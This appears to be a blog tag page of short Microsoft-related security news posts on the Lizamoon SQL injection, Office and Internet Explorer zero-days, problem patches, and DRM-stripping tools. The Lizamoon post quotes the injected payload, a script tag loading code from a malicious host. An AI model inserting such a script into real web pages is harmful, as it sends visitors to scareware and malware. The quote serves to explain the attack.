Tag: MS

  • The Great Lizamoon SQL Injection Attack – March-April 2011

    Well – Friday things started getting interesting on tech news sites. Most sites were running phony April Fools’ stories, and a few, including Websense, were running with a major attack going on against many SQL-based websites. Details were sketchy – people were told to look for ur.php files in their web directory (which isn’t exactly a good test to see if your site has been infected by this SQL injection…). “<script src=http://lizamoon.com/ur.php>” is an example of the code that is inserted into SQL databases, and what it basically does is force visitors to visit a scareware site where malware may be installed onto their computer that claims they have a virus…. (How many of those have we seen in the last 5-10 years?)

    One of my annoyances with tech news (and especially virus news) coverage is that when a story gets big enough to be covered by the big media, they never do it justice. I want information. What is this attacking? What programs are vulnerable, is there a pattern?

  • Oh and ANOTHER PowerPoint vulnerability too….

    Sometimes you feel like the little Dutch boy of myth/legend with his finger trying to plug the hole in a dam…. Incidents brings us this as well…. Another PowerPoint vulnerability seems to have been disclosed. MS has an advisory. All currently supported Office versions are vulnerable (even on Mac?). Workarounds include not opening PowerPoint files… using the PowerPoint Viewer 2003. (I don’t see any word on opening in something like OpenOffice.org Impress – that MAY mitigate the risk.)

  • How Microsoft could patch VML vulnerability before October’s patch day

    So, there’s the second big vulnerability exploit for Internet Explorer making the rounds in about a week, and Microsoft’s advisory says that the most recent flaw will likely be patched on October’s patch day (“unless the need arises…”). So, what would trigger that need? Lots of browsers being subjected to unwanted drive-by downloads? I suppose that doesn’t trigger need for an out-of-cycle patch. True, “lots” is hard to quantify – how many people are really affected by this, home users? office users? etc. After all, there IS a way to mitigate this (unregistering the VML DLL….) – not for the faint of heart, but it’s your computer and you’re responsible for it, right? Last month, a program offered people the capability of removing DRM from Microsoft DRM-protected Windows Media files… it took about 3 days for Microsoft to release a fix…..

  • Internet Explorer zero-day

    This time around, the zero-day is related to Internet Explorer and ActiveX… (DirectAnimation specifically). Incidents has a good update on the issue. This is a second exploit; there was another at the end of August. MS has an advisory on the issue. I think a safe bet would be alternative browsers until this is patched. It is possible, though, to enable a kill bit, or vary security settings to disable/always prompt before using ActiveX.

  • ANOTHER Microsoft patch problem

    This is getting to be like clockwork, but it sounds like this may be one of the nastiest problems so far. It appears that there is a problem with one of the recent patches from Microsoft, MS06-49. It looks as though the problem is data corruption for small files (under 4096 bytes). There’s a Google Groups thread here. The key factor seems to be that IF the folder is compressed, the data within is subject to this possible corruption.

  • Fairuse4wm back on top

    In the struggle between fairuse4wm and Microsoft DRM, it appears that fairuse4wm is out on top again. Just to sum up – the last few weeks saw a release of fairuse4wm that stripped DRM from Microsoft DRM protected media files, then MS fixed their DRM to break fairuse4wm and now fairuse4wm has released a NEW version that breaks Microsoft’s fix and strips DRM from Microsoft DRM protected media files…. DRM software arms race, kind of fun to watch.

  • MS patch problems

    SANS has updated their chart that illustrates Microsoft’s August patches. They’ve updated it to give information about the problems that have been reported with now 2 of this month’s patches (MS06-040 and MS06-042) as well as what fixes are available.

  • Other MS patch news as well as a Yahoo vulnerability?

    Or lack of currently available patch as the case may be. From the previous link it appears that there was at least one previously announced vulnerability that was not addressed in the recent patch day from Microsoft. From MS…

    “this is a DoS only issue that was not addressed in MS06-040, but will be addressed in a bulletin.”

    No timeline yet on when… There are also public exploits out for (possibly related to MS06-046) which is related to the MS Help system.

  • Another Microsoft Office Vulnerability

    Hot on the heels of the Microsoft Word patch, there’s a new threat to Microsoft Office. This vulnerability is with Excel documents. According to the MS Security Response Center blog, they’ve received one report of a system being attacked by a previously unknown vulnerability in Excel. The moral of the story is to be suspicious of any attachments, be they programs, or claim to be images, Word documents, Excel documents, fluffy bunnies or what…. If you weren’t expecting an attachment in email, wait and find out if it’s legit through other channels.

  • Vista torrent pulled

    Several days ago I mentioned vistatorrent.com, which had copied the Windows Vista download into a BitTorrent tracker and allowed BitTorrent downloads of the DVD ISO. Well, they’ve received a cease and desist order as thanks for their efforts. Some are saying the fact that the download servers are slammed to the point MS is recommending that people order the DVD for a shipping charge is proof that Windows Vista is eagerly anticipated and that the response trumps any open source release. Well, ok – I’ve got to say I was interested to see it for all the press it’s been getting (and I’m sure WILL get), and in 12 months I’ll likely be trying to support it, so I wanted to dip the toes in now. I don’t plan on running it on a desktop myself. In fact, the last 24 hours I’ve been on a quest to install it in a virtual machine, and I’ll pass along details of that in another post.
